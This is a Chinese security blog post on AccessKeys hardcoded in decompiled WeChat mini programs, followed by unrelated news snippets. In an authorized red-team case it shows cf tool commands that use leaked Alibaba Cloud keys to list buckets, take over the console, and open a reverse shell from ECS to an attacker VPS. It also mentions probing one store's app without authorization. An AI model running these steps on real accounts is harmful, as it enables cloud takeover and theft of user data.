微信小程序漏洞之accesskey泄露

VSole2023-11-17 10:28:00

1. Accesskey泄露漏洞

这篇文章里面都是以我个人的视角来进行的,因为一些原因,中间删了好多东西,肯定有很多不正确的地方,希望大家能理解,也能指正其中的错误。

在以前文章里面,我们一起学习过mac下新版微信小程序反编译学习,通过反编译,来寻找一些漏洞,今天来学习下小程序里面的硬编码漏洞,其实硬编码漏洞,在这里指的是一些osskeyoss存储桶账号密码信息等写死在了小程序里面,通过反编译可以直接找到这些信息。

Accesskey就是密钥,可以直接理解为账号密码信息,一般由AccessKeySecretOSSAccessKeyId组成,可以通过诸多工具登录云服务器。

关键字:ossaccesskey

这种泄露,目前我反编译过很多小程序里面,也只遇到过几次而已(可能与我接到的需求不同有关),当小程序反编译之后,可以在里面全局搜索关键字,然后看下。

这种漏洞很简单,其实无论是小程序还是app,都是硬编码导致的漏洞。

本文仅对mac版较新的3.8.1版本的微信展开,不对其他环境负责。

本文的操作均是在有授权的情况下进行的。

2. AccessKey泄露案例-某电力行业

在某次攻防演练中,通过信息搜集到某电力行业存在商业小程序,于是通过反编译该小程序,进行快速打点,在这里直接搜到了泄露的Accesskey信息:



通过该信息直接在cf工具上进行配置,查看当前权限:

./cf alibaba perm


获取其中的存储桶信息:

./cf alibaba oss ls


直接看下多少个桶:

./cf alibaba oss ls -n 100


利用命令接管账号权限:(此命令执行之后,阿里云会给账户所有者发送短信和邮件进行提醒)

./cf alibaba console

列出当前的ecs资源:

./cf alibaba ecs ls


列出ecs之后,执行命令,尝试执行命令:

./cf alibaba ecs exec -b

反弹shell看下:

./cf alibaba ecs exec --lhost 攻击机vps --lport 4144 -i i-2

反弹到shell之后,通过命令寻找到了其中存在nacos服务,最终在数据库中找到10w+敏感用户数据。

3. 总结

在有授权的情况下,如果是hw的话,一般时间紧,任务重,主要是以发现有效的信息、RCE为主,而Accesskey这种一般在hw里面出现的可能性还是比较小的,但是在市面上一些其他的小程序里面找到还是相对比较容易的,比如以前看到的某成人用品店:

这个是在以前渗透的时候遇到的:


当时正在学习小程序(比较好奇哪些朋友用过),于是就对其进行了简单的分析,逆向之后就发现了不得了的东西:


当然,因为没有授权,在这里也就结束了。

信息安全微信小程序
本作品采用《CC 协议》,转载必须注明作者和本文链接
程序如何越权访问APP内的特权API?研究员发现身份混淆攻击。
2022年信息安全领域四大顶会之一USENIX Security拉开帷幕。今年又有好消息传来——复旦大学教授杨珉等研究员发表的论文被评为“杰出论文奖”。而这些被委托出去的功能也被称为“子APP”,最常见的莫过于程序。结果显示,上述的三种身份混淆在所有47个被研究的APP中普遍存在。另外,研究团队还负责任地向以上APP的开发者们报告了这一结果,并帮助他们进行漏洞修复。
2022年上半年,浙江省委保密委员会办公室、省国家保密局依法依规查处了一批违反保密法律法规的案件,泄密相对比较突出。现通报6起典型案例。 1节假日用转发涉密文件 1月30日,温州市某银行工作人员刘某某前往上级部门领取了1份秘密级文件。该行领导林某考虑到春节后马上要报送材料,便要求刘某某将该涉密文件拍照以方式发给她。林某收到文件后,又要求刘某某将涉密文件发给同事尤某某。此后,
“公务咔”发布会近年来,因违规使用QQ、等社交软件办公导致信息外泄事件频发,屡禁不止,不少机关干部被问责、处分。事后,胡某某被诫勉谈话,并作深刻检讨。经查,群内员均未通过其他任何途径传播该图片。事后,张某受到党内警告处分,并作出书面检查。公务咔符合工作秘密安全传输要求,助力党政机关解决工作秘密传输渠道缺乏的问题,目前已在福建省国家保密局投入试用。
数字化时代,传统快企业纷纷向线上转型升级,大量业务基于APP、程序、H5 、等渠道接入,直接面向消费者展开花样百出的线上营销活动,如:扫码领红包、集卡送好礼、分享得立减金…… 然而,在快行业一片欣欣向荣的背后,黑产分子早已伺机出动,沉浸在各大品牌的羊毛雨中乐此不疲。数据显示,如果企业在营销时不做风险控制,黑产比例一般在20%以上,甚至有一些高达50%,各个品牌被黑产薅掉的营销费用非常高
1月29日,上海市网办通报称,已依法对一批未有效履行消费者个人信息保护责任、存在严重问题的知名企业予以行政处罚。记者通过采访了解到,作为火锅界“顶流”的某知名火锅连锁品牌赫然在列。
近期,北京市公安局网安部门加大对不履行网络安全保护义务违法行为的打击力度,切实压紧压实网络运营者的主体责任,对未建立管理制度、不履行网络信息安全管理义务的多家违法企业依法给予行政处罚。
新能源汽车充电安全性和可靠性正为众多用户以及场站运营商重点关注的部分,目前很多传统充电桩企业对网络安全的防护远远不足。对于充电桩信息安全防御能力问题,有业内专家指出,保障用户数据的安全,需采取多项措施。Tellus Power集团VP Srikanth表示。
2018年7月起,Chrome浏览器的地址栏把一切HTTP标明为不安全网站,这一标准已在主流浏览器中实行。为了避免以上情况的发生,企业应及时为网站部署SSL证书。且根据我国等保2.0的规定,信息传输要进行加密,如果单位网站要求达到等保2.0的网站,安装SSL证书就是必须的了。一些网站达不到等级保护要求而出现安全事故也要被处罚。
12月12日下午,“2022网络安全治理机制高峰论坛”在京召开。论坛上,人民网“人民投诉”平台联合中国互联网协会12321网络不良与垃圾信息举报受理中心共同开通“网络安全”投诉通道。谷海燕认为,基于数据安全和个人信息保护视域,可从预防高发时间、锁定高发人群、整治网络平台三方面探索电信网络诈骗防控机制。
VSole
网络安全专家